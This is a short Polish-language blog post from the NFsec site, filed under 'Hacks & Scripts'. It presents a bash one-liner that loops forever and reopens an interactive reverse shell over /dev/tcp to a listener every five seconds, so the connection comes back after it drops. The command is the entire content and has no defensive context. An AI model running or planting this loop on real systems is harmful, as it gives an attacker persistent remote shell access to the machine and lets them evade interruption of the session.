NFsec Logo

Pętla dla powłoki zwrotnej bash, gdyby nam zerwało połączenie

24/04/2021 w Hacks & Scripts Brak komentarzy.  (artykuł nr 783, ilość słów: 11)

while :;do sleep 5;/bin/bash -i >/dev/tcp/127.0.0.1/8080 0<&1 2>&1;done 

Kategorie K a t e g o r i e : Hacks & Scripts

Tagi T a g i : , , ,

Komentowanie tego wpisu jest zablokowane.